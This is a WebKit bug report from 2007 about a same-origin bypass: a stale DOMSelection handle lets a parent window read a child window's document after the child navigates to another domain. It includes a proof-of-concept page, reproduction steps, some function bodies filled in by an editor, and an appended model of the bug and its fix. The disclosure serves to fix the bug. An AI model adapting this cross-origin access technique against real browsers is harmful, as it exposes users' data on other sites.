[Webkit-unassigned] [Bug 14610] New: Security problem in DOMWindow

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Jul 13 11:12:42 PDT 2007


           Summary: Security problem in DOMWindow
           Product: WebKit
           Version: 522+ (nightly)
          Platform: All
        OS/Version: All
            Status: NEW
          Keywords: EasyFix, NeedsRadar
          Severity: Normal
          Priority: P1
         Component: WebCore JavaScript
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: ian.eng.webkit at gmail.com

The problem was introduced by recent code refactoring in kjs_window
and DOMWindow. When navigating to a new page, DOMWindow does not
clear up its DOMSelection object.

To show the problem, save the following text into a file, say 'selection.html':

<script>
var child;
var sel;

function openwin() {
  child = open("hello.html");
}

function getsel() {
  sel = child.getSelection();
}

function reloadwin() {
  // Body reconstructed from the steps below: navigate the child window
  // to world.html (served from the other domain).
  child.location = "world.html";
}

function check() {
  var selected = sel.anchorNode;
  var new_doc = selected.ownerDocument;
  // Body reconstructed from the steps below: show which document the
  // selection's anchor node now belongs to.
  alert(new_doc.URL);
}
</script>

<button onclick="openwin()">open</button>
<button onclick="getsel()">get selection</button>
<button onclick="reloadwin()">reload</button>
<button onclick="check()">check</button>

Also create two files called hello.html and world.html.

Put selection.html and hello.html in the same domain, and put
world.html in a different domain (you need to change the URLs of
hello.html and world.html in selection.html).

Do the following steps:
1. load 'selection.html' in a new window;
2. click the 'open' button, it opens a child window;
3. select "hello" text in the child window;
4. click the 'get selection' in the parent window;
5. click the 'check' button, an alert window pops up and displays the
URL of 'hello.html'.

So far so good.

6. click the 'reload' button in the parent window; it loads the
'world.html' page in the child window.
   Note that now the parent window and the child window are in
different domains.
7. select 'world' in the child window;
8. click the 'check' button in the first window. An alert window pops
up and displays the URL of 'world.html'. At this point, the parent
window has full access to the Document object and the DOM nodes under it
in the child window even though they are from different domains.

I will make a patch later.
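The mechanism behind the steps above, as an added model that is not WebKit code and not part of the report: a DOMSelection handle points at its frame rather than at a particular document, so a handle obtained while the child was same-origin keeps reading the child's live selection after it navigates cross-origin, and the parent never has to pass an origin check again because it never calls getSelection a second time. The class names, the `navigate(doc, clearOnNavigate)` switch, the `disconnect()` method and the example.com-style URLs are assumptions chosen to mirror the report's description; the fix modelled here (clearing the selection object when the window navigates) is the one the report asks for.

```javascript
'use strict';

// Assumed toy model of the window/document/selection relationship
// described in the bug report. Not WebKit's classes.
class DOMNode {
  constructor(doc, text) { this.ownerDocument = doc; this.text = text; }
}

class DOMDocument {
  constructor(url, origin, text) {
    this.URL = url;
    this.origin = origin;
    this.body = new DOMNode(this, text);
    this.selectedNode = null;   // set when "the user selects text"
  }
}

// The selection holds a pointer to its window, not to a document, so
// anchorNode reflects whatever the window's *current* document has
// selected. That is exactly why a stale handle keeps working.
class DOMSelection {
  constructor(win) { this.win = win; }
  get anchorNode() {
    if (!this.win) return null;       // disconnected after navigation
    return this.win.document.selectedNode;
  }
  disconnect() { this.win = null; }
}

class DOMWindow {
  constructor(doc) { this.document = doc; this.selection = null; }

  // The origin check only runs when a caller asks for the handle.
  getSelection(caller) {
    if (caller.document.origin !== this.document.origin) {
      throw new Error('SecurityError: cross-origin getSelection');
    }
    if (!this.selection) this.selection = new DOMSelection(this);
    return this.selection;
  }

  // clearOnNavigate=false reproduces the reported bug; true is the fix:
  // the old DOMSelection is cut loose before the new document is installed.
  navigate(newDoc, clearOnNavigate) {
    if (clearOnNavigate && this.selection) {
      this.selection.disconnect();
      this.selection = null;
    }
    this.document = newDoc;
  }
}

// Replays steps 1-8 of the report against the model. Returns the document
// URL the parent can reach before and after the child's navigation (null
// when the handle is dead) and whether a fresh getSelection is refused.
function runScenario(clearOnNavigate) {
  // Constructed sample documents; the hostnames are placeholders.
  const parent = new DOMWindow(
    new DOMDocument('http://a.example/selection.html', 'a.example', ''));
  const hello = new DOMDocument('http://a.example/hello.html', 'a.example', 'hello');
  const world = new DOMDocument('http://b.example/world.html', 'b.example', 'world');
  const child = new DOMWindow(hello);

  hello.selectedNode = hello.body;                  // step 3: select "hello"
  const sel = child.getSelection(parent);           // step 4: same origin, allowed
  const before = sel.anchorNode.ownerDocument.URL;  // step 5

  child.navigate(world, clearOnNavigate);           // step 6: now cross-origin
  world.selectedNode = world.body;                  // step 7: select "world"

  // A fresh request is refused either way; only the stale handle matters.
  let freshDenied = false;
  try { child.getSelection(parent); } catch (e) { freshDenied = true; }

  const node = sel.anchorNode;                      // step 8: no check here
  const after = node ? node.ownerDocument.URL : null;
  return { before, after, freshDenied };
}

module.exports = { runScenario };
```

With the buggy behaviour, `runScenario(false).after` is the world.html URL, i.e. the parent reaches a cross-origin document through a handle it obtained legitimately earlier; with the fix, the same call yields null because the selection object was disconnected at navigation time. Note that `freshDenied` is true in both runs, which is why the stale handle, not getSelection itself, is the hole.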
